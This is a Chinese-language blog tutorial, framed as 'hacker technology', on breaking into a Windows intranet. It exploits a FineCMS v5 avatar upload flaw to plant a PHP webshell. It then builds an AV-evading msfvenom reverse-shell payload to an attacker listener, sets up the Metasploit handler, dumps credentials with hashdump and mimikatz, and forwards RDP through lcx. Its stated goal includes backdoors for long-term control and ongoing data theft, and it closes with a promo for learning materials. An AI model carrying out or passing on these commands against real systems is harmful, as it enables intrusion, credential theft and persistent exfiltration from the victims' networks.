黑客技术之web渗透教程,实战案例演示如何进行windows内网渗透!
黑客技术_web 渗透教程_内网渗透_windows 内网渗透_渗透测试_实战案例_web 安全_内网渗透实战_网络安全_漏洞利用_getshell_内网攻防_渗透测试教程_黑客入门_内网提权_web 渗透测试_安全实战_内网渗透技巧_黑客教程_内网渗透学习
不同操作系统往往存在版本漏洞、中间件漏洞、组件漏洞及端口服务漏洞等,在渗透测试过程中,可通过精细化信息收集,梳理攻击路径与突破思路。
内网渗透思路
本次内网渗透整体思路如下:先通过信息收集对目标网站开展全面分析,摸清资产与服务暴露情况;随后对外网边界服务器实施攻击,获取该服务器控制权;再以攻陷的外网服务器为跳板,对内网其他主机与服务器进行横向渗透;最终获取系统密码、业务数据等核心敏感信息,并视情况部署后门程序,实现对目标网络的长期控制与持续数据窃取。
另一种内网渗透思路为:通过社会工程学等手段,针对企业办公终端、办公无线网络等发起攻击,获取办公主机控制权;再利用已攻陷的办公终端作为切入点,收集内网数据并开展进一步渗透。
渗透过程详解
本次渗透过程将分为webshell—->getshell—->提权
webshell访问某网站,该网站利用的是FineCMS v5系统建站,创建一个新的用户进行测试。
初步判断该网页模板为finecms v5建站系统,然后注册一个新的用户,方便我们利用finecms v5系统的文件上传漏洞
参考链接:blog.csdn.net/dfdhxb99539…

文件上传漏洞在会员头像处,所以先注册一个账号然后登录后上传我们的一句话木马

最开始的文件格式是0x0.png
通过burp代理拦截将tx后面的image/png换成image/php即可


输入参数v=phpinfo();验证成功
文件上传验证成功后,打开相关管理工具,填入上传后的文件路径与一句话木马连接密码,即可建立服务器控制连接。
在工具中可针对数据库执行权限提升操作,包括 MOF 提权、UDF 提权、启动项提权等多种提权方式。
编写免杀木马
通过webshell连接目标服务器,但是访问的数据有限,仅仅是站点的系统账户权限,访问的系统路径也有限,于是我们可以编写免杀木马来进行反弹shell木马su.exe
Msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f exe >/root/Desktop/su.exe

利用刚刚连接菜刀的操作,在文件管理中上传我们需要的工具[
进入meterpreter攻击模块,配置参数
use exploit/multi/handlerSet payload/windows/x64/meterpreter/reverse_tcpSet lport 4444Set lhost 192.168.10.130run

可以利用菜刀的虚拟终端模拟win2008服务器点击免杀木马的操作,让木马生效

run执行监听
获取密码过程
hashdumpload mimikatzkerberos

注:如果win2008的远程桌面操作是不允许连接到这台计算机,那么开启端口转发也是没用的


开启远程桌面



思路一:利用meterpreter模块执行远程连接
然后开启端口转发,-l(本地端口)-p(远程控制端口)-r(目标主机)
靶机3389端口转发发送到本地的5555端口

Rdesktop -u 用户名 -p 密码 127.0.0.1:5555 连接本地的5555端口开启远程桌面

利用windows开启远程桌面,需要利用lcx工具,现在shell模式下输入指令
靶机执行lcx.exe -slave 192.168.10.20 5555 192.168.10.10 3389

思路二:利用lcx工具执行远程连接
攻击机执行lcx.exe. -listen 5555 33891,接着打开mstsc连接127.0.0.1 :33891[

以下为连接成功和监听数据的发送

总结
不同的操作系统可能存在版本漏洞、中间件漏洞、组件漏洞、端口服务漏洞等,在渗透测试的过程中可以通过信息收集来获取思路。
网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取


更多推荐
所有评论(0)